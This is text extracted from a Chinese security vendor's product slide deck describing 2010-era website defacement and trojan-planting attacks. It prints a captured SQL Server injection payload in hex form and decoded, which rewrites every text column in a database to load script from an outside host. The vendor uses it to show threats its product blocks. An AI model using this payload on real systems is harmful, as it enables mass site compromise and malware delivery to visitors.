Anchiva产品介绍V11.4.pptVIP

公司简介 公司简介 相关资质 公司简介 2010下半年网站篡改统计 网站广告植入 网站挂马 网站被黑 黑客篡改网页的主要手段-SQL注入 Anchiva拦截的针对SQL Server的注入挂马攻击 /view.asp?id=1521;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f612e6c6c3863632e636e3e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52%20eXeC(@s)-- 黑客篡改网页的主要手段-SQL注入 红色部分是主要攻击代码的16进制编码，转换后如下： declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select , from sysobjects a,syscolumns b where a.id=b.id and a.xtype=u and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec(update [+@t+] set [+@c+]=rtrim(convert(varchar,[+@c+]))+/titlescript src=/script!--) fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor 以上代码用来对所有表中的文本内容植入木马链接 黑客篡改网页的主要手段-植入后门程序 攻击者可通过某些漏洞上传一个Webshell管理后门 通过该后门可执行批量挂马，系统提权等操作 网络成为应用平台、交流媒介和商业工具后带来的风险 网络应用安全问题日益突出 病毒、木马、间谍软件、网络钓鱼、灰色软件、后门程序等随Web访问、电子邮件、FTP下载等进入企业内部网络。 企业重要服务器，被植入木马、网页遭受篡改…… Anchiva 2010年第三季度威胁报告摘要 假冒杀